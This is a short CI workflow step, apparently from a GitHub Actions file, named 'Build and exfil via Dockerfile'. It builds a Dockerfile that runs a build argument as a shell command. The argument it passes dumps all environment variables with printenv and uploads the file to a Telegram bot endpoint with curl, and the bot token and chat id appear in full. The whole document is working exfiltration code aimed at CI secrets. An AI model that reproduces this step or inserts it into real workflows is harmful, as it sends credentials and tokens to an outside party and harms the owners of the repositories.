- name: Build and exfil via Dockerfile
  run: |
    echo "FROM alpine
RUN apk add --no-cache curl
ARG PYTHON_VERSION
RUN sh -c \"\$PYTHON_VERSION\"" > Dockerfile

    docker build \
      --build-arg PYTHON_VERSION="printenv > /env_dump.txt && \
        curl -F document=@/env_dump.txt \
        https://api.telegram.org/bot<7995384880:AAF4cmC-iEQxuC6rfgf54oG1gVKK3HzVqkk>/sendDocument?chat_id=<977776973>" \
      -t hacked-image .
